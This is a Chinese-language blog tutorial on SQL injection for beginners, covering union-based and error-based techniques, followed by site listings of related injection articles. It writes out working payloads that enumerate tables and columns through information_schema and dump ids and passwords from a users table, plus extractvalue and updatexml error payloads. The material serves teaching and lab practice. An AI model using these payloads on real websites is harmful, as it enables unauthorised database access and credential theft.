SQL注入从零到一

最新推荐文章于 2024-05-19 13:01:37 发布
最新推荐文章于 2024-05-19 13:01:37 发布
阅读量1.3k 收藏 19
点赞数 31
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_76217918/article/details/135686760
版权

SQL基础:

基础查询语句:select 列名 from 表名 where 限定条件

例: select * from users where id=6;

联合查询:select name from users where id=6 union select age from school where name=cc

联合查询会把两次查询的结果一起展示出来,但有个条件:前后两次查询的列数相同

,这就是为什么联合注入需要先判断列数的原因

group by是用来分组的,order by是用来排序的:

select * from users order by 3;

如果少于3列就会报错,所以对于sql注入来说可以帮助我们判断列数

select * from users limit 1,3;          从第一行开始显示三行

select * from users limit 0,3;          从第0行开始显示三行,实际是从零开始计数

select database();

select version();

select group_concat(id,username) from users;     多行信息汇到一行显示

SQL注入基础

SQL注入定义:在原来sql语句查询的基础上,在带入数据库操作的参数拼接恶意的sql语句

SQL注入的分类:

按照查询字段分类有字符型注入和数字型注入

如何判断数字型还是字符型注入:?id=1 and 1=1为真 ?id=1 and 1=2为假  即为数字型

快速判断:?id=2-1的页面和?id=1的页面相同即为数字型。这里不用加号的原因是加号会被识别成空格

字符注入常见闭合方式:' " ') ")

按照注入手法分类有联合注入,报错注入,布尔盲注,时间盲注,堆叠注入,宽字节注入,dnslog注入,二次注入。

注入点:就是可以带入数据库操作,可进行sql注入攻击的参数

Mysql在5.0版本后有个information_schema数据库里面有个tables的表记录了所有的表名,李米娜有个columns的表记录了所有的列名。里面记录的是所有的表名列名,在实际注入的时候还需要筛选限定条件:where table_schema=database()      查询的数据库名为当前数据库,其中table_schema为information_schema.tables和information_schema.columns的列名意为数据库名称

UNION联合注入

  1. 寻找注入点
  2. 判断数字型还是字符型注入,字符型需要判断闭合
  3. 判断列数
  4. 修改原本查询参数为不存在内容并判断回显位
  5. 在回显位构造语句查询当前数据库下所有表名
  6. 在回显位构造语句查询当前数据库下对应表的所有列名
  7. 在回显位构造语句查询当前数据库下指定表的指定列的所有信息

2.and 1=1     and 1=2 或 ?di=2-1的页面和?id=1的页面是否一样一样来判断数字还是字符

3.order by或group by 判断列数

4.union联合注入需要把前面查询的信息输入为一个不存在的参数让他查询失败,不然查询成功他显示的还是union联合查询前面查询的内容

5.查询当前数据库下的表名:

?id=-2' union select 1,2,group_cocat(table_name) from information_schema.tables where table_schema=database() %23

group_concat(table_name)的作用是把信息汇总到一行显示

查询当前数据库下指定表的列名

?id=-2' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' %23

查询指定列的数据

?id=-2' union select 1,2,group_concat(id,'~',password) from users %23

报错注入

extractvalue()

原理:extractvalue(1,2)如果第二个参数不为地址的话机会报错,

我们写成extractvalue(1.concat('~',(查询语句)))即可

concat()是拼接的函数,把前后的字符拼接起来

报错注入默认只能回显32个字符,利用substring函数绕过

substring(1,2,3);

1是查询的内容,2是从第几位开始显示,3是一次显示几个字符

?id=-1' and 1=extractvalue(1,concat('~',(select database()))) %23

updatexml()

updatexml(1,2,3)

原理同上报错位置在2,其他无所谓

?id=-1" and 1=updatexml(1,concat('~',(select database())),3) %23

布尔盲注

通过截取的值比较ascii码的大小页面的真假值判断字符的ascii码为多少进行判断

时间盲注

向日葵武士_
关注
  • 31
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
java sql注入正则表达式_Java程序员从笨鸟到菜鸟之(一百零二)sql注入攻击详解(三)sql注入解决办法...
weixin_36074841的博客
02-24 567
我们了解了sql注入原理和sql注入过程,今天我们就来了解一下sql注入的解决办法。怎么来解决和防范sql注入,由于本人主要是搞javaweb开发的小程序员,所以这里我只讲一下有关于javaweb的防止办法。其实对于其他的,思路基本相似。下面我们先从web应用程序的角度来看一下如何避免sql注入:1、普通用户与系统管理员用户的权限要有严格的区分。如果一个普通用户在使用查询语句中嵌入另一个Dro...
SQL注入自学指南
08-11
而《SQL注入自学指南》全部取材于习科论坛(BlackBap.Org),在技术上直奔主题,从简单到复杂一步一步深入剖析,适合从零基础开始学习的新手。 这本书汇总了习科论坛近几年关于SQL注入的精华帖子,从基础和原理到高级...
SQL注入从0到1
Elite的博客
04-29 2772
SQL注入为OWASP top 10漏洞之一,本文带你由浅入深了解SQL注入基本原理,深度掌握各种注入方式
CTF从零到SQL注入-1
shirazawah的博客
09-14 1758
看到id=1 首先要判断是字符型还是数字型注入 根据书上方法判断数字型 id=3-2 返回页面与id=1的页面不同,说明不是数字型 加入单引号判断是否为字符型 id=1%27(这里'被转译成%27) 没有任何返回,说明有错误,存在注入。 接下来使用order by 判断表的列数。 id=1' order by 3 --+ (空格为%20 --+注释后面的语句) 显示正常 id=1' order by 4 --+ 说明一共有三列 接着我们使用un...
CTF从零到SQL注入攻击
山兔的博客
09-12 433
1.SQL注入攻击是开发者在开发程序时,对客户输入的参数过滤不严格,导致用户能更改数据库。 一.数字型注入: 1.访问链接http://192.168.20.133/sqll.php?id=2的页面和http://192.168.20.133/sqll.php?id=3-1的页面一样,可以说明这个注入点是数字型注入。表现为源码输入点“$_GET['id']”附近没有引号包裹。 2.链接模板:http://192.168.20.133/sqll.php?id=1 union select user,pwd f
CTF从零到SQL注入-2
shirazawah的博客
09-15 391
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
sql注入基础/非常基础/从0到1/
ChenD的学习笔记
10-03 844
SQL注入基础知识+靶场第一关,这章干货满满哦
SQL注入入门基础
weixin_51583379的博客
10-19 1043
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表, 我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
从零基础认识SQL注入
热门推荐
你不知道你不知道的事
09-30 3万+
SQL注入1.什么是SQL注入 看一下下面的案例场景,这是正常情况下的登陆场景: 而当我们使用 用户名‘:– 的时候,密码随便输入也可以登陆成功↓ 这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且将后半句检索条件注释起来达到免密码登陆效果。 sql注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情
SQL注入思路|零基础也能看懂
向阳-Y.的博客
11-03 714
本教程采用墨者学院SQL注入靶机,所以注入方法不一定适用于每一个网站 SQL注入思路 想要sql注入,必须知道数据库的结构(数据库、表名、列名) 1.先判断有无注入点 判断方法: http://xxxxxx?id=1 and 1=1 #正常访问 http://xxxxxx?id=1 and 1=西瓜 #错误页面 当页面出现如上情况,表示有注入点 2.猜解列名数量 (order by x) 以下猜解说明有4个列名 http://xxxxxx?id=1 order by 1 #正常 http:/
习科SQL注入自学指南
06-20
而《SQL注入自学指南》全部取材于习科论坛(BlackBap.Org),在技术上直奔主题,从简单到复杂一步一步深入剖析,适合从零基础开始学习的新手。 这本书汇总了习科论坛近几年关于SQL注入的精华帖子,从基础和原理到高级...
python 零基础学习篇 MySQL数据库3 sql注入和防止sql注入 .mp4
04-21
python 零基础学习篇
python 零基础学习篇 MySQL数据库4 pymysql防止sql注入的多个参数使用 .mp4
04-21
python 零基础学习篇
零起飞CRM管理系统(07FLY-CRM)-代码审计(任意文件删除+RCE+任意文件上传+SQL注入)1
08-03
零起飞CRM管理系统(07FLY-CRM)-代码审计(任意件删除+RCE+任意件上传+SQL注)这选择从数据库名称 $dbname 下, 服务器连接地址, 数据
父子级分类统计分类下数量sql
最新发布
pscool的博客
05-19 66
【代码】父子级分类统计分类下数量sql
小白也会SQL:大模型改变交互方式(中)
鲁班模锤
05-17 746
在人工智能与自然语言处理交汇点,有一种技术正悄然改变与数据交互的方式——将日常语言转化为精准SQL查询。这一“text-to-sql”转换任务,使非专业人士也能轻松驾驭复杂的数据库操作,极大地拓宽了数据应用的边界。
idea创建springboot项目报错:Initialization failed for ‘https://start.spring.io‘
爱吃Java的羊的博客
05-18 127
>勾选Automatic proxy configuration URL: 复选框,并在输入框中录入。->勾选Auto-detect proxy settings复选框。->点击Appearance & Behavior菜单。idea创建springboot项目报错。->点击HTTP Proxy菜单。打开Settings界面。->点击OK报错退出。
SQL的心得
weixin_64842400的博客
05-11 620
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
sql注入零基础实战
02-25
下面是一个零基础的SQL注入实战示例: 假设有一个登录页面,用户需要输入用户名和密码进行登录。后台使用以下SQL语句来验证用户输入的信息: ``` SELECT * FROM users WHERE username = '$username' AND password ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值